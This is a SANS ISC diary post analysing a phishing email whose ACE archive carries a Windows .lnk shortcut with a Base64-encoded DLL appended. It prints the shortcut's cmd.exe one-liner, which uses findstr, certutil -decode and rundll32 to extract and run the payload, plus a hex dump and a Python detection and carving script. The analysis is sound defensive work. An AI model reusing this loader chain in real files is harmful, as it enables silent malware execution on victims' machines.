Original: https://isc.sans.edu/diary/Analyzis+of+a+Malicious+.lnk+File+with+an+Embedded+Payload/20763
We received some feedback today from Nick, a SANS ISC reader who detected an interesting phishing campaign based on an ACE file. I also detected the same kind of file earlier this morning. ACE is an old compression format developed by a German company called E-merge. It was popular around the year 2000. Today it has almost disappeared and has been replaced by more popular formats, but ACE files can still be handled by common tools like WinRAR or WinZip. The fact that the format is quite unusual could help it bypass the low-level filters implemented by anti-spam solutions. The phishing email is a classic one with an attached RAR file named "Faktura.rar". But the file was in fact an ACE file:
# file Faktura.rar
faktura.rar: ACE archive data version, from WIN/32, version to extract, contains AV-String (unregistered), solid
Its VT score is very low: 2/55 (c5e4e981269209f2b67fc24167fc7ce5). The ACE file contains a .lnk file. Link files are shortcut files used by Microsoft Windows to point to another executable file. This file's VT score is also very low: 3/55 (1E56ACF7B536D8F87234B4F7846FE0C0). The link file is configured to start minimized in %currentdir%. It points to a command line prompt with arguments that are pretty evil (the output has been formatted for more visibility):
%windir%\system32\cmd.exe /v:on /c
  dir %temp%\faktura.lnk /s /b > %temp%\bwtfo
  && set /p K=<%TEMP%\BWTFO
  & findstr TVqQAA !k! > %temp%\bwtfo
  && certutil -decode %temp%\bwtfo %temp%\bwtfo.dll
  && del %TEMP%\BWTFO !k!
  && rundll32 %temp%\bwtfo.dll,phojclewfai Yefm
A temporary file is created, filled with the malicious code and executed via rundll32. In this case there is no macro downloading data from a third-party website: the malicious code is simply appended to the link file itself and starts with the string 'TVqQAA' (the Base64 encoding of the 'MZ' header of a PE file):
00000750  ?? ?? ?? ?? ?? ?? ?? ?? ?? 0d 0a 54 56 71 51 41  |.........TVqQA|
00000760  41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41  |AMAAAAEAAAA//8AA|
00000770  4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41  |LgAAAAAAAAAQAAAA|
00000780  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
[...]
000007a0  41 41 41 41 41 41 41 41 41 41 41 75 41 41 41 41  |AAAAAAAAAAAuAAAA|
000007b0  41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54  |A4fug4AtAnNIbgBT|
000007c0  4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63  |M0hVGhpcyBwcm9nc|
000007d0  6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a  |mFtIGNhbm5vdCBiZ|
000007e0  53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49  |SBydW4gaW4gRE9TI|
000007f0  47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41  |G1vZGUuDQ0KJAAAA|
[...]
00000840  4d 50 43 70 59 67 41 41 41 41 41 41 41 41 41 41  |MPCpYgAAAAAAAAAA|
[...]
00000860  51 73 42 42 51 77 41 44 41 41 41 41 41 67 41 41  |QsBBQwADAAAAAgAA|
[...]
00000880  41 41 41 41 41 41 41 45 41 41 41 41 42 41 41 41  |AAAAAAAEAAAABAAA|
00000890  41 41 67 41 41 41 41 41 41 41 51 41 42 41 41 41  |AAgAAAAAAAQABAAA|
000008a0  41 41 43 41 41 41 45 41 41 41 41 41 41 41 41 41  |AACAAAEAAAAAAAAA|
(dump lines that could not be recovered from the original are shown as [...], unknown bytes as ??)
You can see immediately that the code is Base64-encoded and can be extracted quite easily:
# strings Faktura.lnk | grep TVqQAA | base64 -d > malicious.bin
# file malicious.bin
malicious.bin: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
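The two manual steps above, flagging the cmd.exe one-liner and carving the Base64 payload out of the .lnk, can be automated for triage. The following Python is an added example and not code from the diary or from the ISC: the sample .lnk bytes, the fake DLL header and the benign command line are constructed here, and the only real data it reuses is the command line and the Base64 prefix quoted above.

```python
"""Triage helpers for a .lnk carrying a Base64-encoded PE payload.

Added example, not the diary's own code. Two checks the analysis does by hand:
  1. flag a process command line that uses certutil -decode and then
     rundll32 on the file it just decoded (the cmd.exe one-liner in the .lnk);
  2. carve a Base64-encoded PE out of a .lnk, the Python equivalent of
     'strings Faktura.lnk | grep TVqQAA | base64 -d'.
"""
import base64
import hashlib
import re
import struct

# --- 1. command-line indicators ---------------------------------------------
CERTUTIL_DECODE = re.compile(r"certutil(?:\.exe)?\s+-decode\s+\S+\s+(\S+)", re.I)
RUNDLL32_LOAD = re.compile(r"rundll32(?:\.exe)?\s+(\S+?),", re.I)
DIR_LNK = re.compile(r"\bdir\s+\S+\.lnk\b", re.I)


def cmdline_indicators(cmd: str) -> list:
    """Return the suspicious traits found in one process command line."""
    hits = []
    dec = CERTUTIL_DECODE.search(cmd)
    run = RUNDLL32_LOAD.search(cmd)
    if dec:
        hits.append("certutil -decode writes " + dec.group(1))
    if dec and run and dec.group(1).lower() == run.group(1).lower():
        hits.append("rundll32 loads the file certutil just decoded")
    if DIR_LNK.search(cmd) and "findstr" in cmd.lower():
        hits.append("locates its own .lnk and greps it for embedded data")
    return hits


# --- 2. carving the embedded PE ---------------------------------------------
# Base64 of anything starting with 'MZ' (0x4d 0x5a) begins 'TV' plus one of
# o/p/q/r (the third char carries the top two bits of the third byte); 'TVqQ'
# is the 'MZ\x90' case seen in the .lnk. Runs shorter than 64 characters are
# ignored so that random printable data is not decoded.
B64_PE_RE = re.compile(rb"TV[o-r][A-Za-z0-9+/]{61,}={0,2}")


def looks_like_pe(buf: bytes) -> bool:
    """DOS 'MZ' signature present and e_lfanew points at 'PE\\0\\0'."""
    if len(buf) < 0x40 or buf[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    return buf[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def carve_b64_pe(data: bytes) -> list:
    """Return (offset, decoded_pe_bytes) for each Base64 PE embedded in data."""
    found = []
    for m in B64_PE_RE.finditer(data):
        blob = m.group(0)
        blob += b"=" * (-len(blob) % 4)          # restore stripped padding
        try:
            dec = base64.b64decode(blob, validate=True)
        except ValueError:
            continue
        if looks_like_pe(dec):
            found.append((m.start(), dec))
    return found


def triage(data: bytes) -> list:
    """(offset, md5, size) per carved payload: the fields worth logging."""
    return [(off, hashlib.md5(pe).hexdigest(), len(pe)) for off, pe in carve_b64_pe(data)]


# --- constructed sample data -----------------------------------------------
def build_fake_pe() -> bytes:
    """Stand-in for the dropped DLL (constructed, not runnable): a DOS header
    whose first bytes Base64-encode to the 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAA'
    seen in the hex dump, the usual DOS stub text, and a PE signature."""
    hdr = bytearray(0x80)
    hdr[0:3] = b"MZ\x90"
    hdr[4] = 0x03                               # e_cp
    hdr[8] = 0x04                               # e_cparhdr
    hdr[0x0C:0x0E] = b"\xff\xff"                # e_maxalloc
    hdr[0x10] = 0xB8                            # e_sp
    hdr[0x18] = 0x40                            # e_lfarlc
    struct.pack_into("<I", hdr, 0x3C, 0x80)     # e_lfanew -> PE signature
    stub = (b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21"
            b"This program cannot be run in DOS mode.\r\r\n$")
    hdr[0x40:0x40 + len(stub)] = stub
    return bytes(hdr) + b"PE\0\0" + b"\x4c\x01" + b"\0" * 58


# Shortcut-like header bytes (constructed), a CRLF, then the payload: the same
# layout the real .lnk used, with the Base64 appended after the shortcut data.
SAMPLE_LNK = b"L\0\0\0\x01\x14\x02\0" + b"\0" * 40 + b"\r\n" + base64.b64encode(build_fake_pe())

# The diary's command line (spacing normalised) and a constructed benign one.
MALICIOUS_CMD = (r"%windir%\system32\cmd.exe /v:on /c dir %temp%\faktura.lnk /s /b > %temp%\bwtfo"
                 r" && set /p K=<%TEMP%\BWTFO & findstr TVqQAA !k! > %temp%\bwtfo"
                 r" && certutil -decode %temp%\bwtfo %temp%\bwtfo.dll && del %TEMP%\BWTFO !k!"
                 r" && rundll32 %temp%\bwtfo.dll,phojclewfai Yefm")
BENIGN_CMD = r"rundll32.exe shell32.dll,Control_RunDLL timedate.cpl"

if __name__ == "__main__":
    print(cmdline_indicators(MALICIOUS_CMD))
    print(triage(SAMPLE_LNK))
```

Running it against a real sample only needs `triage(open(path, "rb").read())`; the PE header check is what keeps `carve_b64_pe` from dumping every long Base64 string it meets, and the certutil/rundll32 pairing in `cmdline_indicators` is the trait worth alerting on in process-creation logs, since either tool alone is common in legitimate use.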
The PE file has a VT score of 1/55 (a911640a5dd4bca99c31eeac18e90901). I'll have a look at this binary later, because it was not reported as malicious by the FireEye appliance that analyzed it.
Xavier Mertens
ISC Handler - Freelance Security Consultant